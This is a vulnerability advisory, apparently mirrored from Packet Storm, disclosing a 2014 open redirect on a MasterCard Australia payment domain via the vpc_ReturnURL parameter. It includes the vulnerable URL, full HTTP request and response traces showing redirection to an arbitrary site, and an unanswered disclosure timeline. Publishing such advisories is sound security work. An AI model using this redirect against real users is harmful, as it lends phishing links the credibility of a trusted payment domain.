Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

MasterCard Open Redirect

🗓️ 28 Jul 2014 00:00:00Reported by Anastasios MonachosType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 22 Views

MasterCard Open Redirect on mastercard.com.a

Code
`=======================================================================  
MasterCard - Open Redirect  
=======================================================================  
  
Affected Domain : mastercard.com.au  
Local/Remote : Remote  
Severity : Very Low  
Vulnerable URL : https://migs.mastercard.com.au/vpcpay?vpc_ReturnURL=http://<any_domain>  
Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]  
  
[Summary]  
  
Certain unspecified input is not properly verified before being used. This can be exploited to redirect a user to an arbitrary website e.g. when a user clicks a specially crafted link to the affected script hosted on a trusted domain.  
  
[Vulnerability Details]  
  
GET Request:  
------------  
GET https://migs.mastercard.com.au/vpcpay?vpc_ReturnURL=http://www.google.com HTTP/1.1  
Host: migs.mastercard.com.au  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: keep-alive  
  
GET Response:  
-------------  
HTTP/1.1 302 Found  
Date: Mon, 23 May 2014 12:26:51 GMT  
Server: Apache  
P3P: CP="NOI DSP COR CURa ADMa TA1a OUR BUS IND UNI COM NAV INT"  
Set-Cookie: PAY4939831625825013779=PAY8CA6985107791A1B572838CBB73CF5D3; Path=/; Secure  
Expires: Sun, 15 Jun 1990 00:00:00 GMT  
Cache-Control: no-cache  
Set-Cookie: PS_ENCODING_COOKIE=iso-8859-1; Expires=Mon, 23-Jun-2014 12:56:51 GMT; Secure  
Accept-Charset: iso-8859-1, unicode-1-1;q=0.8  
Pragma: no-cache  
Location: https://migs.mastercard.com.au/vpcpay?o=pt&DOID=AA93D612C3210464C0F03BF66D5DCDCE&paymentId=4999831621825113478  
Content-Language: en  
Content-Length: 0  
Keep-Alive: timeout=15, max=79  
Connection: Keep-Alive  
Content-Type: text/html;charset=iso-8859-1  
  
Follow up GET Request I:  
------------------------  
GET https://migs.mastercard.com.au/vpcpay?o=pt&DOID=AA93D612C3210464C0F03BF66D5DCDCE&paymentId=4999831621825113478 HTTP/1.1  
Host: migs.mastercard.com.au  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: keep-alive  
  
GET follow up Response I:  
-------------------------  
HTTP/1.1 302 Found  
Date: Mon, 23 May 2014 12:27:10 GMT  
Server: Apache  
P3P: CP="NOI DSP COR CURa ADMa TA1a OUR BUS IND UNI COM NAV INT"  
Expires: Sun, 15 Jun 1990 00:00:00 GMT  
Cache-Control: no-cache  
Set-Cookie: PS_ENCODING_COOKIE=iso-8859-1; Expires=Mon, 23-Jun-2014 12:57:10 GMT; Secure  
Accept-Charset: iso-8859-1, unicode-1-1;q=0.8  
Pragma: no-cache  
Location: http://www.google.com?vpc_Amount=0&vpc_BatchNo=0&vpc_Locale=en&vpc_Message=Required+field+vpc_Merchant+was+not+present+in+the+request&vpc_TransactionNo=0&vpc_TxnResponseCode=7  
Content-Language: en  
Content-Length: 0  
Keep-Alive: timeout=15, max=100  
Connection: Keep-Alive  
Content-Type: text/html;charset=iso-8859-1  
  
GET follow up Request II:  
-------------------------  
GET http://www.google.com/?vpc_Amount=0&vpc_BatchNo=0&vpc_Locale=en&vpc_Message=Required+field+vpc_Merchant+was+not+present+in+the+request&vpc_TransactionNo=0&vpc_TxnResponseCode=7 HTTP/1.1  
Host: www.google.com  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: keep-alive  
  
GET follow up Response II:  
--------------------------  
HTTP/1.1 302 Found  
Location: http://www.google.com/?gws_rd=cr&ei=QR2oU9PfGYf-ygO6yIC4Dg  
Cache-Control: private  
Content-Type: text/html; charset=UTF-8  
Date: Mon, 23 May 2014 12:27:41 GMT  
Server: gws  
Content-Length: 258  
X-XSS-Protection: 1; mode=block  
X-Frame-Options: SAMEORIGIN  
Alternate-Protocol: 80:quic  
  
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">  
<TITLE>302 Moved</TITLE></HEAD><BODY>  
<H1>302 Moved</H1>  
The document has moved  
<A HREF="http://www.google.com/?gws_rd=cr&ei=QR2oU9PfGYf-ygO6yIC4Dg">here</A>.  
</BODY></HTML>  
  
  
[Time-line]  
  
23/06/2014 - Advisory created  
23/06/2014 - Mastercard notified: no response  
25/06/2014 - Vendor contacted again - different department: no response  
08/07/2014 - Re-contacted both departments: no response  
27/07/2014 - Advisory published  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
28 Jul 2014 00:00Current
7.4High risk
Vulners AI Score7.4
remote vulnerabilityopen redirectmastercardanastasios monachos
22